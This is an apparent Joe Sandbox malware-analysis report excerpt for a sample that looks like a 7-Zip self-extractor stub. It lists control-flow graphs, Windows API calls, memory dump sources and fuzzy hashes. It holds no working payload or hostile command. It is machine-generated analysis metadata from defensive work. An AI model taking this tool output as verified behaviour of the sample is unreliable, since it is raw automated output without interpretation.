                                                                            control_flow_graph 1153 40e9ef-40ea0a call 410a40 1156 40ea19-40ea52 call 406eb0 call 40f707 1153->1156 1157 40ea0c-40ea16 1153->1157 1162 40eb20-40eb46 call 40e79c call 40e6d7 1156->1162 1163 40ea58-40ea62 ??2@YAPAXI@Z 1156->1163 1175 40eb64-40eb7c call 40cdda call 401132 1162->1175 1176 40eb48-40eb5e call 40e2e8 1162->1176 1165 40ea71 1163->1165 1166 40ea64-40ea6f 1163->1166 1167 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1165->1167 1166->1167 1173 40eabe 1167->1173 1174 40eaae-40eabc 1167->1174 1177 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1173->1177 1174->1177 1190 40ebb4-40ebc4 1175->1190 1191 40eb7e-40eb8b ??2@YAPAXI@Z 1175->1191 1176->1175 1184 40ece0-40ecf7 1176->1184 1206 40eb01-40eb06 1177->1206 1207 40eafb-40eafd 1177->1207 1195 40ee93-40eeae call 40e27a 1184->1195 1196 40ecfd 1184->1196 1208 40ebf4-40ebfa 1190->1208 1209 40ebc6 1190->1209 1192 40eb96 1191->1192 1193 40eb8d-40eb94 call 40e7c1 1191->1193 1198 40eb98-40eba8 call 40f707 1192->1198 1193->1198 1212 40eeb0-40eeb6 1195->1212 1213 40eeb9-40eebc 1195->1213 1202 40ed00-40ed30 1196->1202 1221 40ebaa-40ebad 1198->1221 1222 40ebaf 1198->1222 1219 40ed60-40eda6 call 40cd11 * 2 1202->1219 1220 40ed32-40ed38 1202->1220 1217 40eb08-40eb0a 1206->1217 1218 40eb0e-40eb1a 1206->1218 1207->1206 1214 40ec00-40ec20 call 40cf2f 1208->1214 1215 40ecce-40ecdd call 40e977 1208->1215 1216 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1209->1216 1212->1213 1213->1216 1224 40eec2-40eee9 call 40cd11 1213->1224 1234 40ec25-40ec2d 1214->1234 1215->1184 1216->1208 1217->1218 1218->1162 1218->1163 1264 40ee10 1219->1264 1265 40eda8-40edab 1219->1265 1228 40ee00-40ee02 1220->1228 1229 40ed3e-40ed50 1220->1229 1230 40ebb1 1221->1230 1222->1230 1246 40ef01-40ef1d 1224->1246 1247 40eeeb-40eeff call 4107a2 1224->1247 1240 40ee06-40ee0b 1228->1240 1251 40ed56-40ed58 1229->1251 1252 40edda-40eddc 1229->1252 1230->1190 1238 40ec33-40ec3a 1234->1238 1239 40edca-40edcf 1234->1239 1248 40ec68-40ec6b 1238->1248 1249 40ec3c-40ec40 1238->1249 1242 40edd1-40edd3 1239->1242 1243 40edd7 1239->1243 1240->1216 1242->1243 1243->1252 1318 40ef1e call 40bb40 1246->1318 1319 40ef1e call 40c5e0 1246->1319 1320 40ef1e call 40e17a 1246->1320 1321 40ef1e call 41297c 1246->1321 1247->1246 1253 40ec71-40ec7f call 40f707 1248->1253 1254 40edf9-40edfe 1248->1254 1249->1248 1257 40ec42-40ec45 1249->1257 1251->1219 1260 40ed5a-40ed5c 1251->1260 1261 40ede4-40ede7 1252->1261 1262 40edde-40ede0 1252->1262 1281 40ec81-40ec87 call 413226 1253->1281 1282 40ec8c-40ec9d call 40e45f 1253->1282 1254->1228 1254->1240 1267 40ec4b-40ec59 call 40f707 1257->1267 1268 40edec-40edf1 1257->1268 1258 40ef21-40ef2b call 40ce5c 1258->1216 1260->1219 1261->1216 1262->1261 1270 40ee13-40ee19 1264->1270 1275 40edae-40edc6 call 4107a2 1265->1275 1267->1282 1285 40ec5b-40ec66 call 413201 1267->1285 1268->1240 1274 40edf3-40edf5 1268->1274 1277 40ee64-40ee8d call 40ce5c * 2 1270->1277 1278 40ee1b-40ee27 call 40e558 1270->1278 1274->1254 1290 40edc8 1275->1290 1277->1195 1277->1202 1296 40ee35-40ee41 call 40e5a3 1278->1296 1297 40ee29-40ee33 1278->1297 1281->1282 1298 40eca5-40ecaa 1282->1298 1299 40ec9f-40eca1 1282->1299 1285->1282 1290->1270 1311 40ef30-40ef45 call 40ce5c * 2 1296->1311 1312 40ee47 1296->1312 1303 40ee4a-40ee62 call 4107a2 1297->1303 1300 40ecb2-40ecb7 1298->1300 1301 40ecac-40ecae 1298->1301 1299->1298 1306 40ecb9-40ecbb 1300->1306 1307 40ecbf-40ecc8 1300->1307 1301->1300 1303->1277 1303->1278 1306->1307 1307->1214 1307->1215 1311->1216 1312->1303 1318->1258 1319->1258 1320->1258 1321->1258
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID: DmA${D@
                                                                            • API String ID: 1033339047-1777112864
                                                                            • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                            • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                            • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                            • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84
                                                                            Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1322 410ccb-410ce8 call 40e0d0 1325 410e20-410e23 1322->1325 1326 410cee-410cf5 call 41076b 1322->1326 1329 410cf7-410cf9 1326->1329 1330 410cfe-410d2d call 40e036 memcpy 1326->1330 1329->1325 1333 410d30-410d38 1330->1333 1334 410d50-410d68 1333->1334 1335 410d3a-410d48 1333->1335 1341 410d6a-410d6f 1334->1341 1342 410dcf 1334->1342 1336 410dc4-410dcd ??3@YAXPAX@Z 1335->1336 1337 410d4a 1335->1337 1339 410e1e-410e1f 1336->1339 1337->1334 1338 410d4c-410d4e 1337->1338 1338->1334 1338->1336 1339->1325 1344 410d71-410d79 1341->1344 1345 410dd4-410dd7 1341->1345 1343 410dd1-410dd2 1342->1343 1346 410e17-410e1c ??3@YAXPAX@Z 1343->1346 1347 410d7b 1344->1347 1348 410dad-410dbf memmove 1344->1348 1345->1343 1346->1339 1349 410d8a-410d8e 1347->1349 1348->1333 1350 410d90-410d92 1349->1350 1351 410d82-410d84 1349->1351 1350->1348 1353 410d94-410d9d call 41076b 1350->1353 1351->1348 1352 410d86-410d87 1351->1352 1352->1349 1356 410dd9-410e0f memcpy call 40d041 1353->1356 1357 410d9f-410dab 1353->1357 1359 410e12-410e15 1356->1359 1357->1348 1358 410d7d-410d80 1357->1358 1358->1349 1359->1346
                                                                            APIs
                                                                            • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                            • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@memcpymemmove
                                                                            • String ID:
                                                                            • API String ID: 3549172513-0
                                                                            • Opcode ID: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                            • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                            • Opcode Fuzzy Hash: bb969950ca7e8fc586f1592cde3b65447558a250e482fe49850de850b0ee1319
                                                                            • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59
                                                                            Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1374 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1393 404989-40499d SHGetSpecialFolderPathW 1374->1393 1394 404a32-404a36 1393->1394 1395 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1393->1395 1394->1393 1396 404a3c-404a40 1394->1396 1406 4049f2-4049f8 1395->1406 1407 404a22-404a28 1406->1407 1408 4049fa-404a1d call 401370 * 2 call 4032d9 1406->1408 1407->1406 1410 404a2a-404a2d call 40269a 1407->1410 1408->1407 1410->1394
                                                                            APIs
                                                                            • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                              • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                              • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                              • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
                                                                              • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                              • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                              • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                              • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                              • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,00618E68,00000002), ref: 00402334
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                            • wsprintfW.USER32 ref: 004049B0
                                                                              • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                            • String ID: 7zSfxFolder%02d
                                                                            • API String ID: 3387708999-2820892521
                                                                            • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                            • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                            • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                            • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58
                                                                            Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1416 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1420 402c3d-402c59 call 40d00d 1416->1420 1422 402d29 1420->1422 1423 402c5f-402c64 1420->1423 1424 402d2b-402d2f 1422->1424 1423->1422 1425 402c6a-402c74 1423->1425 1426 402c77-402c7c 1425->1426 1427 402cbb-402cc0 1426->1427 1428 402c7e-402c83 1426->1428 1429 402ce5-402d09 memmove 1427->1429 1431 402cc2-402cd5 memcmp 1427->1431 1428->1429 1430 402c85-402c98 memcmp 1428->1430 1436 402d18-402d23 1429->1436 1437 402d0b-402d12 1429->1437 1432 402d25-402d27 1430->1432 1433 402c9e-402ca8 1430->1433 1434 402cb5-402cb9 1431->1434 1435 402cd7-402ce3 1431->1435 1432->1424 1433->1422 1438 402caa-402cb0 call 40292b 1433->1438 1434->1426 1435->1426 1436->1424 1437->1436 1439 402c3a 1437->1439 1438->1434 1439->1420
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                            • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                            • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                            • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                            • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlenmemcmp$memmove
                                                                            • String ID:
                                                                            • API String ID: 3251180759-0
                                                                            • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                            • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                            • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                            • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55
                                                                            Function 00402DD6 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1443 402dd6-402df1 call 401458 1446 402df7-402df8 1443->1446 1447 402ecd-402ee5 call 4013a9 ??3@YAXPAX@Z 1443->1447 1448 402dfb-402dff 1446->1448 1450 402eb3-402ebf call 401526 1448->1450 1451 402e05-402e0d 1448->1451 1459 402ec0-402ec6 1450->1459 1454 402e75-402e7d 1451->1454 1455 402e0f-402e18 call 401c46 1451->1455 1454->1450 1457 402e7f-402e8b call 401c46 1454->1457 1455->1454 1464 402e1a-402e73 call 40283b call 401458 call 402ad8 call 4013a9 ??3@YAXPAX@Z call 401429 ??3@YAXPAX@Z * 2 1455->1464 1457->1450 1466 402e8d-402e99 call 401c46 1457->1466 1459->1448 1462 402ecc 1459->1462 1462->1447 1464->1459 1466->1450 1471 402e9b-402eb1 call 401526 1466->1471 1471->1459
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                              • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1731127917-0
                                                                            • Opcode ID: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                            • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                                            • Opcode Fuzzy Hash: f66a7f98c2fd82f3632a7c41bf5da107477e30d253b96dd7c1c620e0e730c424
                                                                            • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                                            Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1481 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1488 401669 call 40851f 1481->1488 1489 40166e-401689 WaitForSingleObject 1481->1489 1488->1489 1491 40168b-40168e 1489->1491 1492 4016bd-4016c3 1489->1492 1495 401690-401693 1491->1495 1496 4016b1 1491->1496 1493 401721 1492->1493 1494 4016c5-4016da GetExitCodeThread 1492->1494 1502 401726-401729 1493->1502 1497 4016e4-4016ef 1494->1497 1498 4016dc-4016de 1494->1498 1499 401695-401698 1495->1499 1500 4016ad-4016af 1495->1500 1501 4016b3-4016bb call 408dbf 1496->1501 1504 4016f1-4016f2 1497->1504 1505 4016f7-401700 1497->1505 1498->1497 1503 4016e0-4016e2 1498->1503 1506 4016a9-4016ab 1499->1506 1507 40169a-40169d 1499->1507 1500->1501 1501->1493 1503->1502 1509 4016f4-4016f5 1504->1509 1510 401702-401709 1505->1510 1511 40170b-401717 SetLastError 1505->1511 1506->1501 1512 4016a4-4016a7 1507->1512 1513 40169f-4016a2 1507->1513 1515 401719-40171e call 408dbf 1509->1515 1510->1493 1510->1511 1511->1515 1512->1509 1513->1493 1513->1512 1515->1493
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                            • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                              • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                              • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                              • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                              • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                              • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                              • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                              • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                              • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                              • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                              • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                              • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                            • String ID:
                                                                            • API String ID: 359084233-0
                                                                            • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                            • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                            • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                            • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                            Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                            • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                            • wsprintfW.USER32 ref: 004045BB
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: PathTemp$AttributesFilewsprintf
                                                                            • String ID:
                                                                            • API String ID: 1746483863-0
                                                                            • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                            • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                            • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                            • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
                                                                            Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$ExceptionThrow
                                                                            • String ID: (nA
                                                                            • API String ID: 2803161813-867891557
                                                                            • Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                            • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                            • Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                            • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                            Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                            • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: AllocExceptionStringThrow
                                                                            • String ID: PlA
                                                                            • API String ID: 3773818493-1533977103
                                                                            • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                            • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                            • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                            • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                            Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
